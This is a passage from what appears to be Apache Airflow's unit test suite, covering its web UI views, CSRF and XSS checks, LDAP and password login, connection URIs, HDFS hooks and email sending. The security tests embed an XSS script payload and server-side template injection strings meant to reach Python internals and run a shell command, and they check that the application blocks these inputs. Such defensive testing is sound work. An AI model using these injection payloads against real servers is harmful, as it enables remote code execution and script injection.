"/admin/airflow/paused?dag_id=example_python_operator&is_paused=false", ]) for endpoint in endpoints: response = self.app.post(endpoint) self.assertIn('CSRF token is missing', response.data.decode('utf-8')) def test_csrf_acceptance(self): response = self.app.get("/admin/queryview/") csrf = self.get_csrf(response) response = self.app.post("/admin/queryview/", data=dict(csrf_token=csrf)) self.assertEqual(200, response.status_code) def test_xss(self): try: self.app.get("/admin/airflow/tree?dag_id=<script>alert(123456)</script>") except: # exception is expected here since dag doesnt exist pass response = self.app.get("/admin/log", follow_redirects=True) self.assertIn(bleach.clean("<script>alert(123456)</script>"), response.data.decode('UTF-8')) def test_chart_data_template(self): """Protect chart_data from being able to do RCE.""" session = settings.Session() Chart = models.Chart chart1 = Chart( label='insecure_chart', conn_id='airflow_db', chart_type='bar', sql="SELECT {{ ''.__class__.__mro__[1].__subclasses__() }}" ) chart2 = Chart( label="{{ ''.__class__.__mro__[1].__subclasses__() }}", conn_id='airflow_db', chart_type='bar', sql="SELECT 1" ) chart3 = Chart( label="{{ subprocess.check_output('ls') }}", conn_id='airflow_db', chart_type='bar', sql="SELECT 1" ) session.add(chart1) session.add(chart2) session.add(chart3) session.commit() chart1 = session.query(Chart).filter(Chart.label == 'insecure_chart').first() with self.assertRaises(SecurityError): self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart1.id)) chart2 = session.query(Chart).filter( Chart.label == "{{ ''.__class__.__mro__[1].__subclasses__() }}" ).first() with self.assertRaises(SecurityError): self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart2.id)) chart3 = session.query(Chart).filter( Chart.label == "{{ subprocess.check_output('ls') }}" ).first() with self.assertRaises(UndefinedError): self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart3.id)) def tearDown(self): configuration.conf.set("webserver", "expose_config", "False") self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow()) class WebUiTests(unittest.TestCase): def setUp(self): configuration.load_test_config() 
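        # As in SecurityTests above, this suite runs against the test config with
        # webserver authentication disabled so the admin views can be hit directly.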
configuration.conf.set("webserver", "authenticate", "False") configuration.conf.set("webserver", "expose_config", "True") app = application.create_app() app.config['TESTING'] = True app.config['WTF_CSRF_METHODS'] = [] self.app = app.test_client() self.dagbag = models.DagBag(include_examples=True) self.dag_bash = self.dagbag.dags['example_bash_operator'] self.dag_python = self.dagbag.dags['example_python_operator'] self.sub_dag = self.dagbag.dags['example_subdag_operator'] self.runme_0 = self.dag_bash.get_task('runme_0') self.example_xcom = self.dagbag.dags['example_xcom'] self.dagrun_python = self.dag_python.create_dagrun( run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())), execution_date=DEFAULT_DATE, start_date=timezone.utcnow(), state=State.RUNNING ) self.sub_dag.create_dagrun( run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())), execution_date=DEFAULT_DATE, start_date=timezone.utcnow(), state=State.RUNNING ) self.example_xcom.create_dagrun( run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())), execution_date=DEFAULT_DATE, start_date=timezone.utcnow(), state=State.RUNNING ) def test_index(self): response = self.app.get('/', follow_redirects=True) resp_html = response.data.decode('utf-8') self.assertIn("DAGs", resp_html) self.assertIn("example_bash_operator", resp_html) # The HTML should contain data for the last-run. A link to the specific run, # and the text of the date. url = "/admin/airflow/graph?" + urlencode({ "dag_id": self.dag_python.dag_id, "execution_date": self.dagrun_python.execution_date, }).replace("&", "&amp;") self.assertIn(url, resp_html) self.assertIn( self.dagrun_python.execution_date.strftime("%Y-%m-%d %H:%M"), resp_html) def test_query(self): response = self.app.get('/admin/queryview/') self.assertIn("Ad Hoc Query", response.data.decode('utf-8')) response = self.app.post( "/admin/queryview/", data=dict( conn_id="airflow_db", sql="SELECT+COUNT%281%29+as+TEST+FROM+task_instance")) self.assertIn("TEST", response.data.decode('utf-8')) def test_health(self): response = self.app.get('/health') self.assertIn('The server is healthy!', response.data.decode('utf-8')) def test_noaccess(self): response = self.app.get('/admin/airflow/noaccess') self.assertIn("You don't seem to have access.", response.data.decode('utf-8')) def test_pickle_info(self): response = self.app.get('/admin/airflow/pickle_info') self.assertIn('{', response.data.decode('utf-8')) def test_dag_views(self): response = self.app.get( '/admin/airflow/graph?dag_id=example_bash_operator') self.assertIn("runme_0", response.data.decode('utf-8')) # confirm that the graph page loads when execution_date is blank response = self.app.get( '/admin/airflow/graph?dag_id=example_bash_operator&execution_date=') self.assertIn("runme_0", response.data.decode('utf-8')) response = self.app.get( '/admin/airflow/tree?num_runs=25&dag_id=example_bash_operator') self.assertIn("runme_0", response.data.decode('utf-8')) response = self.app.get( '/admin/airflow/duration?days=30&dag_id=example_bash_operator') self.assertIn("example_bash_operator", response.data.decode('utf-8')) response = self.app.get( '/admin/airflow/tries?days=30&dag_id=example_bash_operator') self.assertIn("example_bash_operator", response.data.decode('utf-8')) response = self.app.get( '/admin/airflow/landing_times?' 'days=30&dag_id=example_python_operator') self.assertIn("example_python_operator", response.data.decode('utf-8')) response = self.app.get( '/admin/airflow/landing_times?' 
'days=30&dag_id=example_xcom') self.assertIn("example_xcom", response.data.decode('utf-8')) response = self.app.get( '/admin/airflow/gantt?dag_id=example_bash_operator') self.assertIn("example_bash_operator", response.data.decode('utf-8')) response = self.app.get( '/admin/airflow/code?dag_id=example_bash_operator') self.assertIn("example_bash_operator", response.data.decode('utf-8')) response = self.app.get( '/admin/airflow/blocked') response = self.app.get( '/admin/configurationview/') self.assertIn("Airflow Configuration", response.data.decode('utf-8')) self.assertIn("Running Configuration", response.data.decode('utf-8')) response = self.app.get( '/admin/airflow/rendered?' 'task_id=runme_1&dag_id=example_bash_operator&' 'execution_date={}'.format(DEFAULT_DATE_ISO)) self.assertIn("example_bash_operator", response.data.decode('utf-8')) response = self.app.get( '/admin/airflow/log?task_id=run_this_last&' 'dag_id=example_bash_operator&execution_date={}' ''.format(DEFAULT_DATE_ISO)) self.assertIn("run_this_last", response.data.decode('utf-8')) response = self.app.get( '/admin/airflow/task?' 'task_id=runme_0&dag_id=example_bash_operator&' 'execution_date={}'.format(DEFAULT_DATE_DS)) self.assertIn("Attributes", response.data.decode('utf-8')) response = self.app.get( '/admin/airflow/dag_stats') self.assertIn("example_bash_operator", response.data.decode('utf-8')) response = self.app.get( '/admin/airflow/task_stats') self.assertIn("example_bash_operator", response.data.decode('utf-8')) url = ( "/admin/airflow/success?task_id=print_the_context&" "dag_id=example_python_operator&upstream=false&downstream=false&" "future=false&past=false&execution_date={}&" "origin=/admin".format(DEFAULT_DATE_DS)) response = self.app.get(url) self.assertIn("Wait a minute", response.data.decode('utf-8')) response = self.app.get(url + "&confirmed=true") response = self.app.get( '/admin/airflow/clear?task_id=print_the_context&' 'dag_id=example_python_operator&future=true&past=false&' 'upstream=true&downstream=false&' 'execution_date={}&' 'origin=/admin'.format(DEFAULT_DATE_DS)) self.assertIn("Wait a minute", response.data.decode('utf-8')) url = ( "/admin/airflow/success?task_id=section-1&" "dag_id=example_subdag_operator&upstream=true&downstream=true&" "future=false&past=false&execution_date={}&" "origin=/admin".format(DEFAULT_DATE_DS)) response = self.app.get(url) self.assertIn("Wait a minute", response.data.decode('utf-8')) self.assertIn("section-1-task-1", response.data.decode('utf-8')) self.assertIn("section-1-task-2", response.data.decode('utf-8')) self.assertIn("section-1-task-3", response.data.decode('utf-8')) self.assertIn("section-1-task-4", response.data.decode('utf-8')) self.assertIn("section-1-task-5", response.data.decode('utf-8')) response = self.app.get(url + "&confirmed=true") url = ( "/admin/airflow/clear?task_id=print_the_context&" "dag_id=example_python_operator&future=false&past=false&" "upstream=false&downstream=true&" "execution_date={}&" "origin=/admin".format(DEFAULT_DATE_DS)) response = self.app.get(url) self.assertIn("Wait a minute", response.data.decode('utf-8')) response = self.app.get(url + "&confirmed=true") url = ( "/admin/airflow/clear?task_id=section-1-task-1&" "dag_id=example_subdag_operator.section-1&future=false&past=false&" "upstream=false&downstream=true&recursive=true&" "execution_date={}&" "origin=/admin".format(DEFAULT_DATE_DS)) response = self.app.get(url) self.assertIn("Wait a minute", response.data.decode('utf-8')) self.assertIn("example_subdag_operator.end", 
response.data.decode('utf-8')) self.assertIn("example_subdag_operator.section-1.section-1-task-1", response.data.decode('utf-8')) self.assertIn("example_subdag_operator.section-1", response.data.decode('utf-8')) self.assertIn("example_subdag_operator.section-2", response.data.decode('utf-8')) self.assertIn("example_subdag_operator.section-2.section-2-task-1", response.data.decode('utf-8')) self.assertIn("example_subdag_operator.section-2.section-2-task-2", response.data.decode('utf-8')) self.assertIn("example_subdag_operator.section-2.section-2-task-3", response.data.decode('utf-8')) self.assertIn("example_subdag_operator.section-2.section-2-task-4", response.data.decode('utf-8')) self.assertIn("example_subdag_operator.section-2.section-2-task-5", response.data.decode('utf-8')) self.assertIn("example_subdag_operator.some-other-task", response.data.decode('utf-8')) url = ( "/admin/airflow/run?task_id=runme_0&" "dag_id=example_bash_operator&ignore_all_deps=false&ignore_ti_state=true&" "ignore_task_deps=true&execution_date={}&" "origin=/admin".format(DEFAULT_DATE_DS)) response = self.app.get(url) response = self.app.get( "/admin/airflow/refresh?dag_id=example_bash_operator") response = self.app.get("/admin/airflow/refresh_all") response = self.app.post( "/admin/airflow/paused?" "dag_id=example_python_operator&is_paused=false") self.assertIn("OK", response.data.decode('utf-8')) response = self.app.get("/admin/xcom", follow_redirects=True) self.assertIn("Xcoms", response.data.decode('utf-8')) def test_charts(self): session = Session() chart_label = "Airflow task instance by type" chart = session.query( models.Chart).filter(models.Chart.label == chart_label).first() chart_id = chart.id session.close() response = self.app.get( '/admin/airflow/chart' '?chart_id={}&iteration_no=1'.format(chart_id)) self.assertIn("Airflow task instance by type", response.data.decode('utf-8')) response = self.app.get( '/admin/airflow/chart_data' '?chart_id={}&iteration_no=1'.format(chart_id)) self.assertIn("example", response.data.decode('utf-8')) response = self.app.get( '/admin/airflow/dag_details?dag_id=example_branch_operator') self.assertIn("run_this_first", response.data.decode('utf-8')) def test_fetch_task_instance(self): url = ( "/admin/airflow/object/task_instances?" "dag_id=example_python_operator&" "execution_date={}".format(DEFAULT_DATE_DS)) response = self.app.get(url) self.assertIn("print_the_context", response.data.decode('utf-8')) def test_dag_view_task_with_python_operator_using_partial(self): response = self.app.get( '/admin/airflow/task?' 'task_id=test_dagrun_functool_partial&dag_id=test_task_view_type_check&' 'execution_date={}'.format(DEFAULT_DATE_DS)) self.assertIn("A function with two args", response.data.decode('utf-8')) def test_dag_view_task_with_python_operator_using_instance(self): response = self.app.get( '/admin/airflow/task?' 
'task_id=test_dagrun_instance&dag_id=test_task_view_type_check&' 'execution_date={}'.format(DEFAULT_DATE_DS)) self.assertIn("A __call__ method", response.data.decode('utf-8')) def tearDown(self): configuration.conf.set("webserver", "expose_config", "False") self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow()) session = Session() session.query(models.DagRun).delete() session.query(models.TaskInstance).delete() session.commit() session.close() class SecureModeWebUiTests(unittest.TestCase): def setUp(self): configuration.load_test_config() configuration.conf.set("webserver", "authenticate", "False") configuration.conf.set("core", "secure_mode", "True") app = application.create_app() app.config['TESTING'] = True self.app = app.test_client() def test_query(self): response = self.app.get('/admin/queryview/') self.assertEqual(response.status_code, 404) def test_charts(self): response = self.app.get('/admin/chart/') self.assertEqual(response.status_code, 404) def tearDown(self): configuration.conf.remove_option("core", "SECURE_MODE") class PasswordUserTest(unittest.TestCase): def setUp(self): user = models.User() from airflow.contrib.auth.backends.password_auth import PasswordUser self.password_user = PasswordUser(user) self.password_user.username = "password_test" @mock.patch('airflow.contrib.auth.backends.password_auth.generate_password_hash') def test_password_setter(self, mock_gen_pass_hash): mock_gen_pass_hash.return_value = b"hashed_pass" if six.PY3 else "hashed_pass" self.password_user.password = "secure_password" mock_gen_pass_hash.assert_called_with("secure_password", 12) def test_password_unicode(self): # In python2.7 no conversion is required back to str # In python >= 3 the method must convert from bytes to str self.password_user.password = "secure_password" self.assertIsInstance(self.password_user.password, str) def test_password_user_authenticate(self): self.password_user.password = "secure_password" self.assertTrue(self.password_user.authenticate("secure_password")) def test_password_authenticate_session(self): from airflow.contrib.auth.backends.password_auth import PasswordUser self.password_user.password = 'test_password' session = Session() session.add(self.password_user) session.commit() query_user = session.query(PasswordUser).filter_by( username=self.password_user.username).first() self.assertTrue(query_user.authenticate('test_password')) session.query(models.User).delete() session.commit() session.close() class WebPasswordAuthTest(unittest.TestCase): def setUp(self): configuration.conf.set("webserver", "authenticate", "True") configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.password_auth") app = application.create_app() app.config['TESTING'] = True self.app = app.test_client() from airflow.contrib.auth.backends.password_auth import PasswordUser session = Session() user = models.User() password_user = PasswordUser(user) password_user.username = 'airflow_passwordauth' password_user.password = 'password' print(password_user._password) session.add(password_user) session.commit() session.close() def get_csrf(self, response): tree = html.fromstring(response.data) form = tree.find('.//form') return form.find('.//input[@name="_csrf_token"]').value def login(self, username, password): response = self.app.get('/admin/airflow/login') csrf_token = self.get_csrf(response) return self.app.post('/admin/airflow/login', data=dict( username=username, password=password, csrf_token=csrf_token ), follow_redirects=True) def logout(self): return 
self.app.get('/admin/airflow/logout', follow_redirects=True) def test_login_logout_password_auth(self): self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate')) response = self.login('user1', 'whatever') self.assertIn('Incorrect login details', response.data.decode('utf-8')) response = self.login('airflow_passwordauth', 'wrongpassword') self.assertIn('Incorrect login details', response.data.decode('utf-8')) response = self.login('airflow_passwordauth', 'password') self.assertIn('Data Profiling', response.data.decode('utf-8')) response = self.logout() self.assertIn('form-signin', response.data.decode('utf-8')) def test_unauthorized_password_auth(self): response = self.app.get("/admin/airflow/landing_times") self.assertEqual(response.status_code, 302) def tearDown(self): configuration.load_test_config() session = Session() session.query(models.User).delete() session.commit() session.close() configuration.conf.set("webserver", "authenticate", "False") class WebLdapAuthTest(unittest.TestCase): def setUp(self): configuration.conf.set("webserver", "authenticate", "True") configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth") try: configuration.conf.add_section("ldap") except: pass configuration.conf.set("ldap", "uri", "ldap://openldap:389") configuration.conf.set("ldap", "user_filter", "objectClass=*") configuration.conf.set("ldap", "user_name_attr", "uid") configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com") configuration.conf.set("ldap", "bind_password", "insecure") configuration.conf.set("ldap", "basedn", "dc=example,dc=com") configuration.conf.set("ldap", "cacert", "") app = application.create_app() app.config['TESTING'] = True self.app = app.test_client() def get_csrf(self, response): tree = html.fromstring(response.data) form = tree.find('.//form') return form.find('.//input[@name="_csrf_token"]').value def login(self, username, password): response = self.app.get('/admin/airflow/login') csrf_token = self.get_csrf(response) return self.app.post('/admin/airflow/login', data=dict( username=username, password=password, csrf_token=csrf_token ), follow_redirects=True) def logout(self): return self.app.get('/admin/airflow/logout', follow_redirects=True) def test_login_logout_ldap(self): self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate')) response = self.login('user1', 'userx') self.assertIn('Incorrect login details', response.data.decode('utf-8')) response = self.login('userz', 'user1') self.assertIn('Incorrect login details', response.data.decode('utf-8')) response = self.login('user1', 'user1') self.assertIn('Data Profiling', response.data.decode('utf-8')) response = self.logout() self.assertIn('form-signin', response.data.decode('utf-8')) def test_unauthorized(self): response = self.app.get("/admin/airflow/landing_times") self.assertEqual(response.status_code, 302) def test_no_filter(self): response = self.login('user1', 'user1') self.assertIn('Data Profiling', response.data.decode('utf-8')) self.assertIn('Connections', response.data.decode('utf-8')) def test_with_filters(self): configuration.conf.set('ldap', 'superuser_filter', 'description=superuser') configuration.conf.set('ldap', 'data_profiler_filter', 'description=dataprofiler') response = self.login('dataprofiler', 'dataprofiler') self.assertIn('Data Profiling', response.data.decode('utf-8')) response = self.logout() self.assertIn('form-signin', response.data.decode('utf-8')) response = self.login('superuser', 'superuser') 
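        # With superuser_filter matching, the superuser account should also see the
        # admin-only "Connections" menu entry asserted below.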
self.assertIn('Connections', response.data.decode('utf-8')) def tearDown(self): configuration.load_test_config() session = Session() session.query(models.User).delete() session.commit() session.close() configuration.conf.set("webserver", "authenticate", "False") class LdapGroupTest(unittest.TestCase): def setUp(self): configuration.conf.set("webserver", "authenticate", "True") configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth") try: configuration.conf.add_section("ldap") except: pass configuration.conf.set("ldap", "uri", "ldap://openldap:389") configuration.conf.set("ldap", "user_filter", "objectClass=*") configuration.conf.set("ldap", "user_name_attr", "uid") configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com") configuration.conf.set("ldap", "bind_password", "insecure") configuration.conf.set("ldap", "basedn", "dc=example,dc=com") configuration.conf.set("ldap", "cacert", "") def test_group_belonging(self): from airflow.contrib.auth.backends.ldap_auth import LdapUser users = {"user1": ["group1", "group3"], "user2": ["group2"] } for user in users: mu = models.User(username=user, is_superuser=False) auth = LdapUser(mu) self.assertEqual(set(users[user]), set(auth.ldap_groups)) def tearDown(self): configuration.load_test_config() configuration.conf.set("webserver", "authenticate", "False") class FakeWebHDFSHook(object): def __init__(self, conn_id): self.conn_id = conn_id def get_conn(self): return self.conn_id def check_for_path(self, hdfs_path): return hdfs_path class FakeSnakeBiteClientException(Exception): pass class FakeSnakeBiteClient(object): def __init__(self): self.started = True def ls(self, path, include_toplevel=False): """ the fake snakebite client :param path: the array of path to test :param include_toplevel: to return the toplevel directory info :return: a list for path for the matching queries """ if path[0] == '/datadirectory/empty_directory' and not include_toplevel: return [] elif path[0] == '/datadirectory/datafile': return [{ 'group': u'supergroup', 'permission': 420, 'file_type': 'f', 'access_time': 1481122343796, 'block_replication': 3, 'modification_time': 1481122343862, 'length': 0, 'blocksize': 134217728, 'owner': u'hdfs', 'path': '/datadirectory/datafile' }] elif path[0] == '/datadirectory/empty_directory' and include_toplevel: return [{ 'group': u'supergroup', 'permission': 493, 'file_type': 'd', 'access_time': 0, 'block_replication': 0, 'modification_time': 1481132141540, 'length': 0, 'blocksize': 0, 'owner': u'hdfs', 'path': '/datadirectory/empty_directory' }] elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel: return [{ 'group': u'supergroup', 'permission': 493, 'file_type': 'd', 'access_time': 0, 'block_replication': 0, 'modification_time': 1481132141540, 'length': 0, 'blocksize': 0, 'owner': u'hdfs', 'path': '/datadirectory/empty_directory' }, { 'group': u'supergroup', 'permission': 420, 'file_type': 'f', 'access_time': 1481122343796, 'block_replication': 3, 'modification_time': 1481122343862, 'length': 0, 'blocksize': 134217728, 'owner': u'hdfs', 'path': '/datadirectory/not_empty_directory/test_file' }] elif path[0] == '/datadirectory/not_empty_directory': return [{ 'group': u'supergroup', 'permission': 420, 'file_type': 'f', 'access_time': 1481122343796, 'block_replication': 3, 'modification_time': 1481122343862, 'length': 0, 'blocksize': 134217728, 'owner': u'hdfs', 'path': '/datadirectory/not_empty_directory/test_file' }] elif path[0] == 
'/datadirectory/not_existing_file_or_directory': raise FakeSnakeBiteClientException elif path[0] == '/datadirectory/regex_dir': return [{ 'group': u'supergroup', 'permission': 420, 'file_type': 'f', 'access_time': 1481122343796, 'block_replication': 3, 'modification_time': 1481122343862, 'length': 12582912, 'blocksize': 134217728, 'owner': u'hdfs', 'path': '/datadirectory/regex_dir/test1file' }, { 'group': u'supergroup', 'permission': 420, 'file_type': 'f', 'access_time': 1481122343796, 'block_replication': 3, 'modification_time': 1481122343862, 'length': 12582912, 'blocksize': 134217728, 'owner': u'hdfs', 'path': '/datadirectory/regex_dir/test2file' }, { 'group': u'supergroup', 'permission': 420, 'file_type': 'f', 'access_time': 1481122343796, 'block_replication': 3, 'modification_time': 1481122343862, 'length': 12582912, 'blocksize': 134217728, 'owner': u'hdfs', 'path': '/datadirectory/regex_dir/test3file' }, { 'group': u'supergroup', 'permission': 420, 'file_type': 'f', 'access_time': 1481122343796, 'block_replication': 3, 'modification_time': 1481122343862, 'length': 12582912, 'blocksize': 134217728, 'owner': u'hdfs', 'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_' }, { 'group': u'supergroup', 'permission': 420, 'file_type': 'f', 'access_time': 1481122343796, 'block_replication': 3, 'modification_time': 1481122343862, 'length': 12582912, 'blocksize': 134217728, 'owner': u'hdfs', 'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp' }] else: raise FakeSnakeBiteClientException class FakeHDFSHook(object): def __init__(self, conn_id=None): self.conn_id = conn_id def get_conn(self): client = FakeSnakeBiteClient() return client class ConnectionTest(unittest.TestCase): def setUp(self): configuration.load_test_config() utils.db.initdb() os.environ['AIRFLOW_CONN_TEST_URI'] = ( 'postgres://username:password@ec2.compute.com:5432/the_database') os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = ( 'postgres://ec2.compute.com/the_database') def tearDown(self): env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB'] for ev in env_vars: if ev in os.environ: del os.environ[ev] def test_using_env_var(self): c = SqliteHook.get_connection(conn_id='test_uri') self.assertEqual('ec2.compute.com', c.host) self.assertEqual('the_database', c.schema) self.assertEqual('username', c.login) self.assertEqual('password', c.password) self.assertEqual(5432, c.port) def test_using_unix_socket_env_var(self): c = SqliteHook.get_connection(conn_id='test_uri_no_creds') self.assertEqual('ec2.compute.com', c.host) self.assertEqual('the_database', c.schema) self.assertIsNone(c.login) self.assertIsNone(c.password) self.assertIsNone(c.port) def test_param_setup(self): c = models.Connection(conn_id='local_mysql', conn_type='mysql', host='localhost', login='airflow', password='airflow', schema='airflow') self.assertEqual('localhost', c.host) self.assertEqual('airflow', c.schema) self.assertEqual('airflow', c.login) self.assertEqual('airflow', c.password) self.assertIsNone(c.port) def test_env_var_priority(self): c = SqliteHook.get_connection(conn_id='airflow_db') self.assertNotEqual('ec2.compute.com', c.host) os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \ 'postgres://username:password@ec2.compute.com:5432/the_database' c = SqliteHook.get_connection(conn_id='airflow_db') self.assertEqual('ec2.compute.com', c.host) self.assertEqual('the_database', c.schema) self.assertEqual('username', c.login) self.assertEqual('password', c.password) self.assertEqual(5432, c.port) del os.environ['AIRFLOW_CONN_AIRFLOW_DB'] def 
test_dbapi_get_uri(self): conn = BaseHook.get_connection(conn_id='test_uri') hook = conn.get_hook() self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', hook.get_uri()) conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds') hook2 = conn2.get_hook() self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri()) def test_dbapi_get_sqlalchemy_engine(self): conn = BaseHook.get_connection(conn_id='test_uri') hook = conn.get_hook() engine = hook.get_sqlalchemy_engine() self.assertIsInstance(engine, sqlalchemy.engine.Engine) self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', str(engine.url)) def test_get_connections_env_var(self): conns = SqliteHook.get_connections(conn_id='test_uri') assert len(conns) == 1 assert conns[0].host == 'ec2.compute.com' assert conns[0].schema == 'the_database' assert conns[0].login == 'username' assert conns[0].password == 'password' assert conns[0].port == 5432 def test_get_connections_db(self): conns = BaseHook.get_connections(conn_id='airflow_db') assert len(conns) == 1 assert conns[0].host == 'localhost' assert conns[0].schema == 'airflow' assert conns[0].login == 'root' class WebHDFSHookTest(unittest.TestCase): def setUp(self): configuration.load_test_config() def test_simple_init(self): from airflow.hooks.webhdfs_hook import WebHDFSHook c = WebHDFSHook() self.assertIsNone(c.proxy_user) def test_init_proxy_user(self): from airflow.hooks.webhdfs_hook import WebHDFSHook c = WebHDFSHook(proxy_user='someone') self.assertEqual('someone', c.proxy_user) HDFSHook = None if six.PY2: from airflow.hooks.hdfs_hook import HDFSHook import snakebite @unittest.skipIf(HDFSHook is None, "Skipping test because HDFSHook is not installed") class HDFSHookTest(unittest.TestCase): def setUp(self): configuration.load_test_config() os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = 'hdfs://localhost:8020' def test_get_client(self): client = HDFSHook(proxy_user='foo').get_conn() self.assertIsInstance(client, snakebite.client.Client) self.assertEqual('localhost', client.host) self.assertEqual(8020, client.port) self.assertEqual('foo', client.service.channel.effective_user) @mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient') @mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections') def test_get_autoconfig_client(self, mock_get_connections, MockAutoConfigClient): c = models.Connection(conn_id='hdfs', conn_type='hdfs', host='localhost', port=8020, login='foo', extra=json.dumps({'autoconfig': True})) mock_get_connections.return_value = [c] HDFSHook(hdfs_conn_id='hdfs').get_conn() MockAutoConfigClient.assert_called_once_with(effective_user='foo', use_sasl=False) @mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient') def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient): HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn() MockAutoConfigClient.assert_called_once_with(effective_user=None, use_sasl=False) @mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections') def test_get_ha_client(self, mock_get_connections): c1 = models.Connection(conn_id='hdfs_default', conn_type='hdfs', host='localhost', port=8020) c2 = models.Connection(conn_id='hdfs_default', conn_type='hdfs', host='localhost2', port=8020) mock_get_connections.return_value = [c1, c2] client = HDFSHook().get_conn() self.assertIsInstance(client, snakebite.client.HAClient) send_email_test = mock.Mock() class EmailTest(unittest.TestCase): def setUp(self): configuration.conf.remove_option('email', 'EMAIL_BACKEND') 
@mock.patch('airflow.utils.email.send_email') def test_default_backend(self, mock_send_email): res = utils.email.send_email('to', 'subject', 'content') mock_send_email.assert_called_with('to', 'subject', 'content') self.assertEqual(mock_send_email.return_value, res) @mock.patch('airflow.utils.email.send_email_smtp') def test_custom_backend(self, mock_send_email): configuration.conf.set('email', 'EMAIL_BACKEND', 'tests.core.send_email_test') utils.email.send_email('to', 'subject', 'content') send_email_test.assert_called_with( 'to', 'subject', 'content', files=None, dryrun=False, cc=None, bcc=None, mime_charset='utf-8', mime_subtype='mixed') self.assertFalse(mock_send_email.called) class EmailSmtpTest(unittest.TestCase): def setUp(self): configuration.conf.set('smtp', 'SMTP_SSL', 'False') @mock.patch('airflow.utils.email.send_MIME_email') def test_send_smtp(self, mock_send_mime): attachment = tempfile.NamedTemporaryFile() attachment.write(b'attachment') attachment.seek(0) utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name]) self.assertTrue(mock_send_mime.called) call_args = mock_send_mime.call_args[0] self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0]) self.assertEqual(['to'], call_args[1]) msg = call_args[2] self.assertEqual('subject', msg['Subject']) self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From']) self.assertEqual(2, len(msg.get_payload())) filename = u'attachment; filename="' + os.path.basename(attachment.name) + '"' self.assertEqual(filename, msg.get_payload()[-1].get(u'Content-Disposition')) mimeapp = MIMEApplication('attachment') self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload()) @mock.patch('airflow.utils.email.send_MIME_email') def test_send_smtp_with_multibyte_content(self, mock_send_mime): utils.email.send_email_smtp('to', 'subject', '🔥', mime_charset='utf-8') self.assertTrue(mock_send_mime.called) call_args = mock_send_mime.call_args[0] msg = call_args[2] mimetext = MIMEText('🔥', 'mixed', 'utf-8') self.assertEqual(mimetext.get_payload(), msg.get_payload()[0].get_payload()) @mock.patch('airflow.utils.email.send_MIME_email') def test_send_bcc_smtp(self, mock_send_mime): attachment = tempfile.NamedTemporaryFile() attachment.write(b'attachment') attachment.seek(0) utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc') self.assertTrue(mock_send_mime.called) call_args = mock_send_mime.call_args[0] self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0]) self.assertEqual(['to', 'cc', 'bcc'], call_args[1]) msg = call_args[2] self.assertEqual('subject', msg['Subject']) self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From']) self.assertEqual(2, len(msg.get_payload())) self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"', msg.get_payload()[-1].get(u'Content-Disposition')) mimeapp = MIMEApplication('attachment') self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload()) @mock.patch('smtplib.SMTP_SSL') @mock.patch('smtplib.SMTP') def test_send_mime(self, mock_smtp, mock_smtp_ssl): mock_smtp.return_value = mock.Mock() mock_smtp_ssl.return_value = mock.Mock() msg = MIMEMultipart() utils.email.send_MIME_email('from', 'to', msg, dryrun=False) mock_smtp.assert_called_with( configuration.conf.get('smtp', 'SMTP_HOST'), configuration.conf.getint('smtp', 'SMTP_PORT'), ) self.assertTrue(mock_smtp.return_value.starttls.called) 
